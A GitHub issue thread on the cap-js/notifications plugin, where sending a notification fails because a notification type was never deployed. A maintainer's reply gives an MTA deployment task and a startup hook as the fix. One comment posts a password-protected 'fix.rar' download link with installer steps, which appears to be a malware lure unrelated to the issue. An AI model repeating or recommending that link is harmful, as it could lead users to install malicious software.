### ISSUE TITLE
Emit Failed because NotificationType doesn't exists

### ISSUE THREAD

**Issue by Dawood-Ghaznavi** [cap-js/notifications#58]
Gives the following error when you try to send a notification:
 [notifications] - Sending notification of key: Default and version: 1 [persistent-outbox] - Emit failed { event: 'Default', cause: Error: NotificationType with key Default and version 1 does not exist at NotifyToRest.postNotification (/home/user/projects/Student/node_modules/@cap-js/notifications/srv/notifyToRest.js:35:21) at process.processTicksAndRejections (node:internal/process/task_queues:95:5) at async Promise.all (index 0) at async NotifyToRest.handle (/home/user/projects/Student/node_modules/@sap/cds/lib/srv/srv-dispatch.js:65:21) at async ODataRequest.<anonymous> (/home/user/projects/Student/node_modules/@sap/cds/libx/outbox/index.js:286:18) at async ODataRequest.emit (/home/user/projects/Student/node_modules/@sap/cds/lib/req/context.js:58:9) at async ApplicationService.commit (/home/user/projects/Student/node_modules/@sap/cds/lib/srv/srv-tx.js:132:7) at async /home/user/projects/Student/node_modules/@sap/cds/libx/_runtime/cds-services/adapter/odata-v4/handlers/action.js:61:9 { unrecoverable: true } }

**Comment by youngerwarrior** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by joris-vdb** [comment]
Please refer to an older similar issue -- https://github.com/cap-js/notifications/issues/44
I was running into the same issue last week, this helped me a lot and got it working now.

**Comment by StoilAtSAP** [comment]
This issue is related to #44 which was resolved.

  The error occurs because notification types need to be deployed to the Alert Notification Service before use. The plugin provides
  `lib/content-deployment.js` for this purpose, but this isn't clearly documented.

  **Solution:**

  Add a deployment task to your MTA descriptor:

  ```yaml
  - name: notification-content-deployment
    type: nodejs
    path: gen/srv
    parameters:
      no-route: true
      no-start: true
      memory: 256M
      tasks:
        - name: deploy-notification-types
          command: "node node_modules/@cap-js/notifications/lib/content-deployment.js"
          memory: 256M
    requires:
      - name: <your-ans-service>
      - name: <your-destination-service>
      - name: <your-xsuaa-service>

  Or call it manually during application startup:
  cds.on("served", async () => {
      const {deployNotificationTypes} = require("@cap-js/notifications/lib/content-deployment");
      await deployNotificationTypes();
  })

  Closing as duplicate of #44.
